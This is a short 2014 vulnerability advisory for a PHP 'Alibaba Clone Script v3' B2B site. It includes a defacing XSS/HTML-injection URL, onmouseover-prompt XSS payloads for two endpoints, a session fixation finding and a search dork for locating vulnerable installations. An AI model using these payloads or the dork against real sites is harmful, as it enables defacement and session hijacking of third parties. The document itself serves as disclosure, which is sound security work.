facebook facebook twitter rss

Alibaba Clone Script v3 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Alibaba Clone Script v3 Multi Vulnerability
===========================================
Author : indoushka
Vondor : www.p30vel.ir
Dork : A new PHP B2B Web
======================================

( XSS / HTML Inject) :

http://127.0.0.1//Alibaba/logging.php?forward=http://127.0.0.1/Alibaba/office-room/index.php%22%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%22

Cross site scripting (verified) :

This vulnerability affects /Alibaba/logging.php

Attack details :
URL encoded GET input forward was set to http://127.0.0.1/Alibaba/office-room/index.php" onmouseover=prompt(965929) bad="
This vulnerability affects /Alibaba/offer/post.php
Attack details
POST (multipart) input data[tradefield][address] was set to 3137 Laguna Street" onmouseover=prompt(908278) bad="
The input is reflected inside a tag parameter between double quotes.

Session fixation :
This vulnerability affects /Alibaba/logging.php.
Discovered by: Scripting (Session_Fixation.script).
Attack details
Session cookie PHPSESSID was fixed to dfgjldkmfnmnmklhgmffixation.

Like us on Facebook :